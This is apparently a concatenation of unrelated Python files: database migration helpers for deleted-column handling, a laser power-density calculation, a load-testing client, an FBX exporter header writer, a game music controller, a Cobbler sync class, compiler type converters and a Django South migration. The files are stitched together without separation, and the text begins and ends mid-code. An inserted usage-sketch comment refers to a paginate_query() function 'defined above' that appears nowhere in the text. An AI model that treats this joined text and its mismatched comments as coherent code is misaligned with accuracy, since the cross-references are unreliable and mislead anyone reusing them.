**col_name_col_instance): """Drop unique constraint from table. This method drops UC from table and works for mysql, postgresql and sqlite. In mysql and postgresql we are able to use "alter table" construction. Sqlalchemy doesn't support some sqlite column types and replaces their type with NullType in metadata. We process these columns and replace NullType with the correct column type. 
    :param migrate_engine: sqlalchemy engine
    :param table_name: name of table that contains uniq constraint.
    :param uc_name: name of uniq constraint that will be dropped.
    :param columns: columns that are in uniq constraint.
    :param col_name_col_instance: contains pair column_name=column_instance.
                           column_instance is instance of Column. These params
                           are required only for columns that have unsupported
                           types by sqlite. For example BigInteger.
    """
    meta = MetaData()
    meta.bind = migrate_engine
    t = Table(table_name, meta, autoload=True)

    if migrate_engine.name == "sqlite":
        override_cols = [
            _get_not_supported_column(col_name_col_instance, col.name)
            for col in t.columns
            if isinstance(col.type, NullType)
        ]
        for col in override_cols:
            t.columns.replace(col)

    uc = UniqueConstraint(*columns, table=t, name=uc_name)
    uc.drop()


def drop_old_duplicate_entries_from_table(migrate_engine, table_name,
                                          use_soft_delete, *uc_column_names):
    """Drop all old rows having the same values for columns in uc_columns.

    This method drops (or marks as `deleted`, if use_soft_delete is True) old
    duplicate rows from the table named `table_name`.

    :param migrate_engine:  Sqlalchemy engine
    :param table_name:      Table with duplicates
    :param use_soft_delete: If True - values will be marked as `deleted`,
                            if False - values will be removed from table
    :param uc_column_names: Unique constraint columns
    """
    meta = MetaData()
    meta.bind = migrate_engine

    table = Table(table_name, meta, autoload=True)
    columns_for_group_by = [table.c[name] for name in uc_column_names]

    columns_for_select = [func.max(table.c.id)]
    columns_for_select.extend(columns_for_group_by)

    duplicated_rows_select = select(columns_for_select,
                                    group_by=columns_for_group_by,
                                    having=func.count(table.c.id) > 1)

    for row in migrate_engine.execute(duplicated_rows_select):
        # NOTE(boris-42): Do not remove row that has the biggest ID.
delete_condition = table.c.id != row[0] is_none = None # workaround for pyflakes delete_condition &= table.c.deleted_at == is_none for name in uc_column_names: delete_condition &= table.c[name] == row[name] rows_to_delete_select = select([table.c.id]).where(delete_condition) for row in migrate_engine.execute(rows_to_delete_select).fetchall(): LOG.info(_("Deleting duplicated row with id: %(id)s from table: " "%(table)s") % dict(id=row[0], table=table_name)) if use_soft_delete: delete_statement = table.update().\ where(delete_condition).\ values({ 'deleted': literal_column('id'), 'updated_at': literal_column('updated_at'), 'deleted_at': timeutils.utcnow() }) else: delete_statement = table.delete().where(delete_condition) migrate_engine.execute(delete_statement) def _get_default_deleted_value(table): if isinstance(table.c.id.type, Integer): return 0 if isinstance(table.c.id.type, String): return "" raise ColumnError(_("Unsupported id columns type")) def _restore_indexes_on_deleted_columns(migrate_engine, table_name, indexes): table = get_table(migrate_engine, table_name) insp = reflection.Inspector.from_engine(migrate_engine) real_indexes = insp.get_indexes(table_name) existing_index_names = dict( [(index['name'], index['column_names']) for index in real_indexes]) # NOTE(boris-42): Restore indexes on `deleted` column for index in indexes: if 'deleted' not in index['column_names']: continue name = index['name'] if name in existing_index_names: column_names = [table.c[c] for c in existing_index_names[name]] old_index = Index(name, *column_names, unique=index["unique"]) old_index.drop(migrate_engine) column_names = [table.c[c] for c in index['column_names']] new_index = Index(index["name"], *column_names, unique=index["unique"]) new_index.create(migrate_engine) def change_deleted_column_type_to_boolean(migrate_engine, table_name, **col_name_col_instance): if migrate_engine.name == "sqlite": return _change_deleted_column_type_to_boolean_sqlite( migrate_engine, table_name, **col_name_col_instance) insp = reflection.Inspector.from_engine(migrate_engine) indexes = insp.get_indexes(table_name) table = get_table(migrate_engine, table_name) old_deleted = Column('old_deleted', Boolean, default=False) old_deleted.create(table, populate_default=False) table.update().\ where(table.c.deleted == table.c.id).\ values(old_deleted=True).\ execute() table.c.deleted.drop() table.c.old_deleted.alter(name="deleted") _restore_indexes_on_deleted_columns(migrate_engine, table_name, indexes) def _change_deleted_column_type_to_boolean_sqlite(migrate_engine, table_name, **col_name_col_instance): insp = reflection.Inspector.from_engine(migrate_engine) table = get_table(migrate_engine, table_name) columns = [] for column in table.columns: column_copy = None if column.name != "deleted": if isinstance(column.type, NullType): column_copy = _get_not_supported_column(col_name_col_instance, column.name) else: column_copy = column.copy() else: column_copy = Column('deleted', Boolean, default=0) columns.append(column_copy) constraints = [constraint.copy() for constraint in table.constraints] meta = table.metadata new_table = Table(table_name + "__tmp__", meta, *(columns + constraints)) new_table.create() indexes = [] for index in insp.get_indexes(table_name): column_names = [new_table.c[c] for c in index['column_names']] indexes.append(Index(index["name"], *column_names, unique=index["unique"])) c_select = [] for c in table.c: if c.name != "deleted": c_select.append(c) else: c_select.append(table.c.deleted == table.c.id) ins = 
InsertFromSelect(new_table, select(c_select)) migrate_engine.execute(ins) table.drop() [index.create(migrate_engine) for index in indexes] new_table.rename(table_name) new_table.update().\ where(new_table.c.deleted == new_table.c.id).\ values(deleted=True).\ execute() def change_deleted_column_type_to_id_type(migrate_engine, table_name, **col_name_col_instance): if migrate_engine.name == "sqlite": return _change_deleted_column_type_to_id_type_sqlite( migrate_engine, table_name, **col_name_col_instance) insp = reflection.Inspector.from_engine(migrate_engine) indexes = insp.get_indexes(table_name) table = get_table(migrate_engine, table_name) new_deleted = Column('new_deleted', table.c.id.type, default=_get_default_deleted_value(table)) new_deleted.create(table, populate_default=True) deleted = True # workaround for pyflakes table.update().\ where(table.c.deleted == deleted).\ values(new_deleted=table.c.id).\ execute() table.c.deleted.drop() table.c.new_deleted.alter(name="deleted") _restore_indexes_on_deleted_columns(migrate_engine, table_name, indexes) def _change_deleted_column_type_to_id_type_sqlite(migrate_engine, table_name, **col_name_col_instance): # NOTE(boris-42): sqlaclhemy-migrate can't drop column with check # constraints in sqlite DB and our `deleted` column has # 2 check constraints. So there is only one way to remove # these constraints: # 1) Create new table with the same columns, constraints # and indexes. (except deleted column). # 2) Copy all data from old to new table. # 3) Drop old table. # 4) Rename new table to old table name. insp = reflection.Inspector.from_engine(migrate_engine) meta = MetaData(bind=migrate_engine) table = Table(table_name, meta, autoload=True) default_deleted_value = _get_default_deleted_value(table) columns = [] for column in table.columns: column_copy = None if column.name != "deleted": if isinstance(column.type, NullType): column_copy = _get_not_supported_column(col_name_col_instance, column.name) else: column_copy = column.copy() else: column_copy = Column('deleted', table.c.id.type, default=default_deleted_value) columns.append(column_copy) def is_deleted_column_constraint(constraint): # NOTE(boris-42): There is no other way to check is CheckConstraint # associated with deleted column. if not isinstance(constraint, CheckConstraint): return False sqltext = str(constraint.sqltext) return (sqltext.endswith("deleted in (0, 1)") or sqltext.endswith("deleted IN (:deleted_1, :deleted_2)")) constraints = [] for constraint in table.constraints: if not is_deleted_column_constraint(constraint): constraints.append(constraint.copy()) new_table = Table(table_name + "__tmp__", meta, *(columns + constraints)) new_table.create() indexes = [] for index in insp.get_indexes(table_name): column_names = [new_table.c[c] for c in index['column_names']] indexes.append(Index(index["name"], *column_names, unique=index["unique"])) ins = InsertFromSelect(new_table, table.select()) migrate_engine.execute(ins) table.drop() [index.create(migrate_engine) for index in indexes] new_table.rename(table_name) deleted = True # workaround for pyflakes new_table.update().\ where(new_table.c.deleted == deleted).\ values(deleted=new_table.c.id).\ execute() # NOTE(boris-42): Fix value of deleted column: False -> "" or 0. deleted = False # workaround for pyflakes new_table.update().\ where(new_table.c.deleted == deleted).\ values(deleted=default_deleted_value).\ execute()
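# A minimal, hypothetical usage sketch for paginate_query() defined above:
# page through rows ordered by the compound key (created_at, id), passing the
# last row of the previous page as the marker. The Instance model, session,
# and marker_id parameter are assumptions for illustration; only the call
# pattern follows the docstring's criteria
# (k1 > X1) OR (k1 == X1 AND k2 > X2).
def get_instance_page(session, Instance, limit, marker_id=None):
    marker = None
    if marker_id is not None:
        # The marker must be a real row; paginate_query() reads the sort-key
        # values off this object to build the WHERE criteria.
        marker = session.query(Instance).get(marker_id)
    query = session.query(Instance)
    query = paginate_query(query, Instance, limit,
                           sort_keys=['created_at', 'id'],
                           marker=marker, sort_dir='asc')
    return query.all()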
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Created on Wed Nov 8 08:46:10 2017 @author: thanasi """ import numpy as np from pint import UnitRegistry ureg = UnitRegistry() Q = ureg.Quantity # %% # pulse energy #e0 = Q(250, "mJ") e0 = (Q(1,"mJ") * 8.1596 + Q(0.375,"mJ")) * 0.055 # pulse duration tau = Q(4, "ns") # peak power # conservative estimate, assuming gaussian temporal profile peak_pow = 2 * (e0 / tau).to("W") # beam diameter d0 = Q(7, "mm") # beam area A = (np.pi * d0**2 / 4).to("cm^2") energy_density = (e0 / A).to("J/cm^2") peak_pow_dens = (peak_pow / A).to("MW/cm^2") print("-"*33) print("E-Density: {:0.3g~}".format(energy_density)) print("P-Density: {:0.1f~}".format(peak_pow_dens)) print("-"*33) # %% # check necessary extinction for photodetector # Thorlabs DET025A # power damage threshold p_dam_thresh = Q(18, "mW") # energy damage threshold, given beam properties above e_dam_thresh = (p_dam_thresh*tau/2).to("mJ") # detector active area det_area = Q(250, "um")**2 # maximum allowable power density max_det_pow_dens = p_dam_thresh / det_area # reduction factor needed from laser beam red = (peak_pow_dens / max_det_pow_dens).to("").magnitude red_OD = np.ceil(np.log10(red)) print("-"*33) print("Max Peak Power: {:1.2g}".format(p_dam_thresh)) print("Max Beam Energy: {:1.2g}".format(e_dam_thresh)) print("Power Reduction Needed: {:1.2g}".format(red)) print("OD Needed: {:2.0f}".format(red_OD)) print("-"*33)
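# A small standalone helper (not part of the script above) restating its
# attenuation step: a neutral-density filter of optical density OD transmits
# 10**(-OD), so the OD needed for a given power-reduction factor is
# ceil(log10(factor)). The example value in the comment is illustrative only.
import math


def required_od(reduction_factor):
    """Smallest integer OD whose attenuation covers reduction_factor."""
    return int(math.ceil(math.log10(reduction_factor)))

# e.g. required_od(3.2e4) == 5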
import sys import argparse import os import json import requests from loadsbroker import logger from loadsbroker.util import set_logger def _parse(sysargs=None): if sysargs is None: sysargs = sys.argv[1:] parser = argparse.ArgumentParser(description='Runs a Loads client.') parser.add_argument('--scheme', help='Server Scheme', type=str, default='http') parser.add_argument('--host', help='Server Host', type=str, default='localhost') parser.add_argument('--port', help='Server Port', type=int, default=8080) parser.add_argument('--debug', help='Debug Info.', action='store_true', default=True) subparsers = parser.add_subparsers(help='sub-command help') for cmd_name, cmd in sorted(_COMMANDS.items()): sub = subparsers.add_parser(cmd_name, help=cmd.__doc__.strip()) for argument, options in cmd.arguments.items(): sub.add_argument(argument, **options) sub.set_defaults(func=cmd) args = parser.parse_args(sysargs) return args, parser _COMMANDS = {} def load_commands(): for file in os.listdir(os.path.dirname(__file__)): if file.startswith('cmd_') and file.endswith('.py'): mod = 'loadsbroker.client.' + file[:-len('.py')] mod = __import__(mod, globals(), locals(), ['cmd'], 0) _COMMANDS[mod.cmd.name] = mod.cmd load_commands() class Client(object): def __init__(self, host='localhost', port=8080, scheme='http'): self.port = port self.host = host self.scheme = scheme self.root = '%s://%s:%d/api' % (scheme, host, port) self.session = requests.Session() def __call__(self, command, **options): cmd = _COMMANDS[command] return cmd(self.session, self.root)(**options) def main(sysargs=None): args, parser = _parse(sysargs) set_logger(debug=args.debug) c = Client(args.host, args.port, args.scheme) if not hasattr(args, 'func'): args.func = _COMMANDS['info'] args.func = args.func(c.session, c.root) try: res = args.func(args) print(json.dumps(res)) except requests.exceptions.ConnectionError as e: logger.debug('Cannot connect => ' + str(e)) if __name__ == '__main__': main()
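# A hypothetical sketch of what a loadsbroker client sub-command module
# (e.g. a "cmd_info.py" file) could look like, inferred from how
# load_commands() and main() above consume it: the module must expose a `cmd`
# class with a `name`, a docstring (used as sub-command help), an `arguments`
# dict mapping argument names to argparse options, an __init__(session, root),
# and a __call__ that receives the parsed args and returns something
# JSON-serializable. The endpoint used and the '--verbose' flag are assumptions.
class Info(object):
    """Fetches broker information."""

    name = 'info'
    arguments = {'--verbose': {'action': 'store_true',
                               'help': 'Return extended information'}}

    def __init__(self, session, root):
        self.session = session
        self.root = root

    def __call__(self, args):
        # GET <root>/ and hand the decoded JSON back to main(), which prints it.
        res = self.session.get(self.root)
        return res.json()


cmd = Info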
#!/usr/bin/python2.7 # -*- coding: utf-8 -*- """ **Project Name:** MakeHuman **Product Home Page:** http://www.makehuman.org/ **Code Home Page:** https://bitbucket.org/MakeHuman/makehuman/ **Authors:** Thomas Larsson, Jonas Hauquier **Copyright(c):** MakeHuman Team 2001-2014 **Licensing:** AGPL3 (http://www.makehuman.org/doc/node/the_makehuman_application.html) This file is part of MakeHuman (www.makehuman.org). This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. **Coding Standards:** See http://www.makehuman.org/node/165 Abstract -------- Fbx headers """ from . import fbx_skeleton from . import fbx_mesh from . import fbx_deformer from . import fbx_material from . import fbx_anim def writeHeader(fp, filepath, config): import datetime today = datetime.datetime.now() id = 39112896 if config.binary: from . import fbx_binary import os root = fp fbx_binary.fbx_header_elements(root, config, today) name = os.path.splitext(os.path.basename(filepath))[0] fbx_binary.fbx_documents_elements(root, name, id) fbx_binary.fbx_references_elements(root) return import fbx_utils mesh_orientation = fbx_utils.getMeshOrientation(config) up_axis, front_axis, coord_axis = fbx_utils.RIGHT_HAND_AXES[mesh_orientation] fp.write("""; FBX 7.3.0 project file ; Exported from MakeHuman TM (www.makehuman.org) ; ---------------------------------------------------- FBXHeaderExtension: { FBXHeaderVersion: 1003 FBXVersion: 7300 """ + """ CreationTimeStamp: { Version: 1000 Year: %d Month: %d Day: %d Hour: %d Minute: %d Second: %d Millisecond: %d } """ % (int(today.strftime('%Y')), int(today.strftime('%m')), int(today.strftime('%d')), int(today.strftime('%H')), int(today.strftime('%M')), int(today.strftime('%S')), int(float(today.strftime('%f'))/1000)) + """ Creator: "FBX SDK/FBX Plugins version 2013.3" SceneInfo: "SceneInfo::GlobalInfo", "UserData" { Type: "UserData" Version: 100 MetaData: { Version: 100 Title: "" Subject: "" Author: "www.makehuman.org" Keywords: "" Revision: "" Comment: "" } Properties70: { """ + ' P: "DocumentUrl", "KString", "Url", "", "%s"\n' % filepath + ' P: "SrcDocumentUrl", "KString", "Url", "", "%s"\n' % filepath + """ P: "Original", "Compound", "", "" P: "Original|ApplicationVendor", "KString", "", "", "" P: "Original|ApplicationName", "KString", "", "", "" P: "Original|ApplicationVersion", "KString", "", "", "" P: "Original|DateTime_GMT", "DateTime", "", "", "" P: "Original|FileName", "KString", "", "", "" P: "LastSaved", "Compound", "", "" P: "LastSaved|ApplicationVendor", "KString", "", "", "" P: "LastSaved|ApplicationName", "KString", "", "", "" P: "LastSaved|ApplicationVersion", "KString", "", "", "" P: "LastSaved|DateTime_GMT", "DateTime", "", "", "" } } } GlobalSettings: { Version: 1000 Properties70: { P: "UpAxis", "int", "Integer", "",%s P: "UpAxisSign", "int", "Integer", "",%s P: "FrontAxis", "int", "Integer", "",%s P: "FrontAxisSign", "int", "Integer", "",%s P: "CoordAxis", "int", "Integer", "",%s P: "CoordAxisSign", "int", 
"Integer", "",%s P: "OriginalUpAxis", "int", "Integer", "",-1 P: "OriginalUpAxisSign", "int", "Integer", "",1 P: "UnitScaleFactor", "double", "Number", "",10 P: "OriginalUnitScaleFactor", "double", "Number", "",1 P: "AmbientColor", "ColorRGB", "Color", "",0,0,0 P: "DefaultCamera", "KString", "", "", "Producer Perspective" P: "TimeMode", "enum", "", "",0 P: "TimeSpanStart", "KTime", "Time", "",0 P: "TimeSpanStop", "KTime", "Time", "",46186158000 P: "CustomFrameRate", "double", "Number", "",-1 } }""" % (up_axis[0], up_axis[0], front_axis[0], front_axis[1], coord_axis[0], coord_axis[1]) + """ ; Documents Description ;------------------------------------------------------------------ Documents: { Count: 1 Document: %s, "Scene", "Scene" {""" % id + """ Properties70: { P: "SourceObject", "object", "", "" P: "ActiveAnimStackName", "KString", "", "", "" P: "COLLADA_ID", "KString", "", "", "Scene" } RootNode: 0 } } ; Document References ;------------------------------------------------------------------ References: { } """) def writeObjectDefs(fp, meshes, skel, action, config): count = ( fbx_skeleton.countObjects(skel) + fbx_mesh.countObjects(meshes) + fbx_deformer.countObjects(meshes, skel) + 1 ) if config.useMaterials: count += fbx_material.countObjects(meshes) if action: count += fbx_anim.countObjects(action) if config.binary: from . import fbx_binary fbx_binary.fbx_definitions_elements(fp, count) return fp.write( """ ; Object definitions ;------------------------------------------------------------------ Definitions: { Version: 100 """ + ' Count: %d' % count + """ ObjectType: "GlobalSettings" { Count: 1 } """) def writeObjectProps(fp, config): if config.binary: from . import fbx_binary objects = fbx_binary.elem_empty(fp, b"Objects") return fp.write( """ ; Object properties ;------------------------------------------------------------------ Objects: { """) def writeLinks(fp, config): if config.binary: from . import fbx_binary fbx_binary.fbx_connections_element(fp) return fp.write( """ ; Object connections ;------------------------------------------------------------------ Connections: { """)
# -*- coding: utf-8 -*- """ *==LICENSE==* CyanWorlds.com Engine - MMOG client, server and tools Copyright (C) 2011 Cyan Worlds, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Additional permissions under GNU GPL version 3 section 7 If you modify this Program, or any covered work, by linking or combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK, NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK (or a modified version of those libraries), containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA, PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the licensors of this Program grant you additional permission to convey the resulting work. Corresponding Source for a non-source form of such a combination shall include the source code for the parts of OpenSSL and IJG JPEG Library used as well as that of the covered work. You can contact Cyan Worlds, Inc. by email [email protected] or by snail mail at: Cyan Worlds, Inc. 14617 N Newport Hwy Mead, WA 99021 *==LICENSE==* """ """ Module: clftIntroMusic.py Age: Cleft Date: October 2006 Author: Tye Hooley Controls the Intro Music """ from Plasma import * from PlasmaTypes import * actStartMusic01 = ptAttribActivator(1,"Start Music Activator 01") actStartMusic02 = ptAttribActivator(2,"Start Music Activator 02") actStartMusic03 = ptAttribActivator(3,"Start Music Activator 03") respStartMusic = ptAttribResponder(4,"Start Music Repsonder") respStartRandomMusic = ptAttribResponder(5,"Start Random Music Responder") actStopMusic = ptAttribActivator(6,"Stop Music Activator") respStopInitialMusic = ptAttribResponder(7,"Stop Initial Music Responder") respStopRandomMusic = ptAttribResponder(8,"Stop Random Music Responder") # globals #Music States kOff = 0 kInitialPlay = 1 kRandomPlay = 2 musicState = kOff class clftIntroMusic(ptResponder): def __init__(self): global musicState ptResponder.__init__(self) self.id = 5249 self.version = 1 def OnNotify(self,state,id,events): global musicState if state == false: return #print "clftIntroMusic: We've got notification from ID #:%s" %id #-----Activators----- startMusicActIDs = (actStartMusic01.id, actStartMusic02.id, actStartMusic03.id) if id in startMusicActIDs: if musicState == kOff: print "clftIntroMusic: ---Starting Music---" musicState = kInitialPlay respStartMusic.run(self.key) return elif id == actStopMusic.id: if musicState == kInitialPlay: print "clftIntroMusic: ###Stopping Music###" respStopInitialMusic.run(self.key) elif musicState == kRandomPlay: print "clftIntroMusic: ###Stopping Music###" respStopRandomMusic.run(self.key) musicState = kOff return #-----Responders----- elif id == respStartMusic.id: if musicState == kInitialPlay: print "clftIntroMusic: ___Randomly Starting Music___" musicState = kRandomPlay respStartRandomMusic.run(self.key) 
return
""" Running small pieces of cobbler sync when certain actions are taken, such that we don't need a time consuming sync when adding new systems if nothing has changed for systems that have already been created. Copyright 2006-2009, Red Hat, Inc and Others Michael DeHaan <michael.dehaan AT gmail> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA """ import os import os.path import clogger import module_loader import utils class CobblerLiteSync: """ Handles conversion of internal state to the tftpboot tree layout """ def __init__(self, collection_mgr, verbose=False, logger=None): """ Constructor """ self.verbose = verbose self.collection_mgr = collection_mgr self.distros = collection_mgr.distros() self.profiles = collection_mgr.profiles() self.systems = collection_mgr.systems() self.images = collection_mgr.images() self.settings = collection_mgr.settings() self.repos = collection_mgr.repos() if logger is None: logger = clogger.Logger() self.logger = logger self.tftpd = module_loader.get_module_from_file("tftpd", "module", "in_tftpd").get_manager(collection_mgr, logger) self.sync = collection_mgr.api.get_sync(verbose, logger=self.logger) self.sync.make_tftpboot() def add_single_distro(self, name): # get the distro record distro = self.distros.find(name=name) if distro is None: return # copy image files to images/$name in webdir & tftpboot: self.sync.tftpgen.copy_single_distro_files(distro, self.settings.webdir, True) self.tftpd.add_single_distro(distro) # create the symlink for this distro src_dir = utils.find_distro_path(self.settings, distro) dst_dir = os.path.join(self.settings.webdir, "links", name) if os.path.exists(dst_dir): self.logger.warning("skipping symlink, destination (%s) exists" % dst_dir) elif utils.path_tail(os.path.join(self.settings.webdir, "distro_mirror"), src_dir) == "": self.logger.warning("skipping symlink, the source (%s) is not in %s" % (src_dir, os.path.join(self.settings.webdir, "distro_mirror"))) else: try: self.logger.info("trying symlink %s -> %s" % (src_dir, dst_dir)) os.symlink(src_dir, dst_dir) except (IOError, OSError): self.logger.error("symlink failed (%s -> %s)" % (src_dir, dst_dir)) # generate any templates listed in the distro self.sync.tftpgen.write_templates(distro, write_file=True) # cascade sync kids = distro.get_children() for k in kids: self.add_single_profile(k.name, rebuild_menu=False) self.sync.tftpgen.make_pxe_menu() def add_single_image(self, name): image = self.images.find(name=name) self.sync.tftpgen.copy_single_image_files(image) kids = image.get_children() for k in kids: self.add_single_system(k.name) self.sync.tftpgen.make_pxe_menu() def remove_single_distro(self, name): bootloc = utils.tftpboot_location() # delete contents of images/$name directory in webdir utils.rmtree(os.path.join(self.settings.webdir, "images", name)) # delete contents of images/$name in tftpboot utils.rmtree(os.path.join(bootloc, "images", name)) # 
delete potential symlink to tree in webdir/links utils.rmfile(os.path.join(self.settings.webdir, "links", name)) def remove_single_image(self, name): bootloc = utils.tftpboot_location() utils.rmfile(os.path.join(bootloc, "images2", name)) def add_single_profile(self, name, rebuild_menu=True): # get the profile object: profile = self.profiles.find(name=name) if profile is None: # most likely a subprofile's kid has been # removed already, though the object tree has # not been reloaded ... and this is just noise. return # rebuild the yum configuration files for any attached repos # generate any templates listed in the distro self.sync.tftpgen.write_templates(profile) # cascade sync kids = profile.get_children() for k in kids: if k.COLLECTION_TYPE == "profile": self.add_single_profile(k.name, rebuild_menu=False) else: self.add_single_system(k.name) if rebuild_menu: self.sync.tftpgen.make_pxe_menu() return True def remove_single_profile(self, name, rebuild_menu=True): # delete profiles/$name file in webdir utils.rmfile(os.path.join(self.settings.webdir, "profiles", name)) # delete contents on autoinstalls/$name directory in webdir utils.rmtree(os.path.join(self.settings.webdir, "autoinstalls", name)) if rebuild_menu: self.sync.tftpgen.make_pxe_menu() def update_system_netboot_status(self, name): self.tftpd.update_netboot(name) def add_single_system(self, name): # get the system object: system = self.systems.find(name=name) if system is None: return # rebuild system_list file in webdir if self.settings.manage_dhcp: self.sync.dhcp.regen_ethers() if self.settings.manage_dns: self.sync.dns.regen_hosts() # write the PXE files for the system self.tftpd.add_single_system(system) def remove_single_system(self, name): bootloc = utils.tftpboot_location() system_record = self.systems.find(name=name) # delete contents of autoinsts_sys/$name in webdir system_record = self.systems.find(name=name) for (name, interface) in system_record.interfaces.iteritems(): filename = utils.get_config_filename(system_record, interface=name) utils.rmfile(os.path.join(bootloc, "pxelinux.cfg", filename)) utils.rmfile(os.path.join(bootloc, "grub", filename.upper()))
# # Copyright 2012 NVIDIA Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # import backendtypes as ET import coretypes as T import backendsyntax as ES import coresyntax as S def back_to_front_type(x): concrete = ET.unvariate(x) if isinstance(concrete, ET.Sequence): sub = back_to_front_type(concrete.sub()) return T.Seq(sub) elif isinstance(concrete, ET.Tuple): return T.Tuple(*[back_to_front_type(y) for y in concrete]) elif isinstance(concrete, ET.Monotype): name = str(x) if name == 'Int32': return T.Int elif name == 'Int64': return T.Long elif name == 'Bool': return T.Bool elif name == 'Float32': return T.Float elif name == 'Float64': return T.Double else: raise ValueError("Unknown monotype %s" % name) else: raise ValueError("Unknown type") def front_to_back_type(x): if isinstance(x, T.Polytype): variables = [ET.Monotype(str(y)) for y in x.variables] sub = front_to_back_type(x.monotype()) return ET.Polytype(variables, sub) elif isinstance(x, T.Tuple): subs = [front_to_back_type(y) for y in x.parameters] return ET.Tuple(*subs) elif isinstance(x, T.Fn): args = front_to_back_type(x.parameters[0]) result = front_to_back_type(x.parameters[1]) return ET.Fn(args, result) elif isinstance(x, T.Seq): sub = front_to_back_type(x.unbox()) return ET.Sequence(sub) elif isinstance(x, T.Monotype): if str(x) == str(T.Int): return ET.Int32 elif str(x) == str(T.Long): return ET.Int64 elif str(x) == str(T.Float): return ET.Float32 elif str(x) == str(T.Double): return ET.Float64 elif str(x) == str(T.Bool): return ET.Bool elif str(x) == str(T.Void): return ET.Void elif isinstance(x, str): return ET.Monotype(str(x)) raise ValueError("Can't convert %s to backendtypes" % str(x)) def front_to_back_node(x): if isinstance(x, list): subs = [front_to_back_node(y) for y in x] return ES.Suite(subs) elif isinstance(x, S.Name): name = ES.Name(x.id, front_to_back_type(x.type)) return name elif isinstance(x, S.Number): literal = ES.Literal(str(x), front_to_back_type(x.type)) return literal elif isinstance(x, S.Tuple): subs = [front_to_back_node(y) for y in x] tup = ES.Tuple(subs, front_to_back_type(x.type)) return tup elif isinstance(x, S.Apply): fn = front_to_back_node(x.function()) args = [front_to_back_node(y) for y in x.arguments()] arg_types = [front_to_back_type(y.type) for y in x.arguments()] appl = ES.Apply(fn, ES.Tuple(args, ET.Tuple(arg_types))) return appl elif isinstance(x, S.Bind): lhs = front_to_back_node(x.binder()) rhs = front_to_back_node(x.value()) return ES.Bind(lhs, rhs) elif isinstance(x, S.Return): val = front_to_back_node(x.value()) return ES.Return(val) elif isinstance(x, S.Cond): test = front_to_back_node(x.test()) body = front_to_back_node(x.body()) orelse = front_to_back_node(x.orelse()) return ES.Cond(test, body, orelse) elif isinstance(x, S.Lambda): args = [front_to_back_node(y) for y in x.formals()] body = front_to_back_node(x.body()) lamb = ES.Lambda(ES.Tuple(args), body, front_to_back_type(x.type)) return lamb elif isinstance(x, S.Closure): closed_over = [front_to_back_node(y) for y in 
x.closed_over()] closed_over_types = [front_to_back_type(y.type) for y in x.closed_over()] body = front_to_back_node(x.body()) closure = ES.Closure(ES.Tuple(closed_over, ET.Tuple(closed_over_types)), body, front_to_back_type(x.type)) return closure elif isinstance(x, S.Procedure): name = front_to_back_node(x.name()) formals = [front_to_back_node(y) for y in x.formals()] formal_types = [front_to_back_type(y.type) for y in x.formals()] body = front_to_back_node(x.body()) proc = ES.Procedure(name, ES.Tuple(formals, ET.Tuple(formal_types)), body, front_to_back_type(x.name().type)) return proc elif isinstance(x, S.Subscript): base = front_to_back_node(x.value()) sl = front_to_back_node(x.slice()) return ES.Subscript(base, sl, front_to_back_type(x.type))
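# A small, hypothetical round-trip sketch for the two type converters above:
# based on the branches shown, a front-end Seq(Int) maps to a back-end
# Sequence(Int32) and converts back again. This relies on T.Seq.unbox() and
# ET.Sequence.sub() behaving as the code above assumes; it is illustrative,
# not a test from the original module.
def _roundtrip_demo():
    front = T.Seq(T.Int)
    back = front_to_back_type(front)   # expected: ET.Sequence(ET.Int32)
    again = back_to_front_type(back)   # expected: T.Seq(T.Int)
    return front, back, again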
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Changing field 'ProductVariation.sku' db.alter_column('shop_productvariation', 'sku', self.gf('cartridge.shop.fields.SKUField')(max_length=20, unique=True, null=True)) # Adding field 'Product.num_in_stock' db.add_column('shop_product', 'num_in_stock', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True), keep_default=False) def backwards(self, orm): # User chose to not deal with backwards NULL issues for 'ProductVariation.sku' raise RuntimeError("Cannot reverse this migration. 'ProductVariation.sku' and its values cannot be restored.") # Deleting field 'Product.num_in_stock' db.delete_column('shop_product', 'num_in_stock') models = { 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], 